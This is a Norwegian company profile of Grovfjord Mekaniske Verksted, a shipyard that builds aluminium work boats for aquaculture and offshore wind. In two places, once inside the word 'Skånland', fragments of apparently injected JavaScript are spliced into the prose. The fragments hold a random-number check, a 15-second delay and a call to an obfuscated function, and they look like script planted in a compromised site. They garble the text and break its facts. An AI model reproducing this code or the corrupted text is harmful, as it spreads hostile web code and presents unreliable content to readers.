Grovfjord Mekaniske Verksted – en innovativ bedrift innerst i fjorden
Bnr. 97- Developer ble levert til Northern Offshore Services 2014.
De siste årene har Grovfjord Mekaniske Verksted, GMV, spesialisert seg på bygging av arbeidsbåter i aluminium til oppdrettsnæringa, vindmølleparken til havs og havnevesenet. Bedriften utfører ellers reparasjoner og vedlikehold av fiskebåter, arbeidsbåter samt utfører andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre industrioppdrag.

Bedriften ble etablert i 1919 og har 90- års erfaring med motorreparasjoner, tradisjonell skipsservice, ombygging og nybygging av båter. De siste årene har Grovfjord Mekaniske Verksted fokusert spesielt på nybygg av fartøy til oppdrettsnæringen, deriblant hurtiggående røkterbåter og båter for personelltransport, store servicekatamaraner samt tradisjonelle røkterbåter. Ny produksjonshall gjør det mulig å levere om lag 9 store arbeidsbåter i året.

Grovfjord Mekaniske Verksted AS er lokalisert i Grovfjord i Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and kommune i Nord-Norge, ca 50 minutters biltur fra Harstad/Narvik Evenes Flyplass. De produserer arbeidsbåter i aluminium for oppdrettsnæringen, og kan tilby egne fartøykonsepter som er skreddersydd etter kundens behov.

Deltagelse i FoU-prosjekter i samarbeid med SINTEF og NTNU har resultert i bedre byggemetoder som gir sterkere båter med bedre finish og lavere byggekostnader. Bedriften er i dag å regne for en av de fremste byggerne av båter for oppdrettsnæringen.

Rådmannen på besøk hos Elisabeth og Bård i GMV

Bildene viser da Rådmannen og Utviklings- og næringssjefen besøkte Elisabeth og Bård på GMN.

«Bård i Grovfjord bygger havets Tesla» – Christian Chramer, Regiondirektør for NHO med ansvar for Troms og Svalbard.